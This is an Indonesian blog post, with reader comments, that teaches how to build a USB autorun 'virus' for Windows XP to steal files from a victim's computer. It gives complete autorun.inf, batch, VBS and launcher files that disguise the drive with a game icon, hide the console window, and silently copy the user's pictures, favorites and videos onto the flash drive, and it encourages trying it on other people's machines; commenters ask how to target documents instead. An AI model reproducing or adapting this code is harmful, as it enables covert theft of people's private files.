MENCURI DATA MENGGUNAKAN USB VIRUS AUTORUN



Kita coba mendiskusikan cara mencuri data menggunakan Flash Disk dengan membuat virus autorun yang mampu mencuri file melalui USB yang terpasang pada komputer korban. Namun, perlu di ketahui, tips ini hanya bekerja pada sistem operasi Windows XP.

Langkah 1: Buka Notepad, copy-paste baris berikut dan simpan sebagai autorun.inf

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Baris “icon=” adalah perintah untuk mengubah ikon sesuai selera kita atau di biarkan sesuai ikon default. Ini berguna untuk menarik pengguna agar mengklik file pada drive dengan membuatnya tampak seperti permainan (game).

Baris "action=" adalah perintah agar korban membuka sebuah file. Namun, jenis file yang akan di buka, tergantung pada apa yang kita masukkan di baris sini agar di jalankan olehnya. Kode ini sebenarnya berfungsi sebagai cadangan jika pengguna bingung apa yang harus di buka.

"Shell\open\command" juga menjadi cadangan jika pengguna mengklik atau membatalkan membuka sebuah file. Kode ini akan berjalan ketika huruf drive di klik.

Langkah 2: Sekali lagi buka Notepad dan copy-paste baris berikut serta simpan sebagai file.bat

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls


File ini dikonfigurasi untuk menyalin isi dari gambar milik pengguna, favorit file dan folder video ke Flash Disk di bawah sebuah folder bernama "all". Ini adalah bagian dari kode kita dan bisa di edit tergantung pada apa yang ingin kita salin dari komputer korban.

The first file path "%USERPROFILE%\pictures" – is the target.
The second file path "%drive%\all\My pics" – is the destination.

Langkah 3: Buka Notepad sekali lagi dan copy-paste baris berikut lalu simpan dengan nama: invisible.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Kode ini akan menjalankan file.bat sebagai suatu proses hacking sehingga tidak meng-eksekusi CMD prompt dan semua file batch lainnya.

Langkah 4: Buka Notepad terakhir kalinya dan copy-paste baris berikut lalu simpan dengan nama launch.bat,

wscript.exe \invisible.vbs file.bat


Batch file ini akan meng-eksekusi dua hal, yakni file invisible.vbs di root Flash Disk kemudian file.bat sehingga file.bat dijalankan dengan kode dari file VBS.

Langkah 5: Salin semua file yang dibuat dalam 4 langkah di atas kemudian simpan Flash Disk, termasuk file icon jika diperlukan. Juga perlu membuat folder bernama "all" di mana isinya akan disalin secara otomatis.

Kita dapat memanggil folder ini dengan nama apapun, tapi kemudian kita perlu menyesuaikan setiap perubahan dengan baris perintah di atas.

Terakhir, uji dulu Flash Disk di komputer kita sendiri sebelum bermain-main dengan komputer orang lain. Jika bisa bekerja sempurna, maka Flash Disk kita menjadi Flash Disk yang sakti.


digg it
buzz yahoo
google
Stumble
Delicious
Technorati
Twitter
Facebook
reddit

4 comments:

Anonymous said...

bagaimana kalau kita hanya ingin mengcopy file extensi doc/docx/xlsx saja... atau yang kita inginkan..??

belajar on 3 April 2012 01:54 said...

flash nya harus kosong mas..atau kalo ada isina juga bisa

farid elly on 7 December 2012 02:31 said...

gan buat juga yang untuk windows 7

Blog Teknologi Informasi Indonesia on 5 March 2013 04:03 said...

Kalo targetnya adalah drive caranya gimana? sy tunggu jawabanya di blog saya


Post a Comment

Posting Terakhir

 
  • Hack Facebook Sebagaimana laporan Techcrunch, Firesheep telah di download ribuan kali sejak di luncurkan beberapa waktu lalu. Firesheep adalah salah satu software Add-ons browser Mozilla Firefox terbaru yang di gunakan...
  • Sharing Foto di Yahoo Messenger Yahoo Messenger atau yang sering disingkat dengan YM memiliki fasilitas untuk share picture kepada chatter lain. Dengan demikian jika dua chatter saling melakukan Private Message, maka keduanya bisa saling...
  • Mujaher Korek Menu ikan panggang banyak di jumpai di sejumlah daerah. Namun, menu ikan mujaher panggang dengan sambal terasi pedas khas Jawa Timuran, hanya ada di Lamongan. Mujaher panggang hadir dengan....
  • Batik Gorga Khas Batak Memadukan motif khas Batak dengan aneka warna, bengkel kreasi yang telah berdiri sejak tahun 2008 lalu, menghasilkan aneka ragam kain batik khas tanah Batak yang memiliki nilai estetika yang cukup tinggi....
  • Awet Muda Dengan Pisang Getuk merupakan makanan tradisional, umumnya terbuat dari singkong. Namun, warga di kaki gunung Slamet tepatnya di Desa Serang, Kecamatan Karangreja,...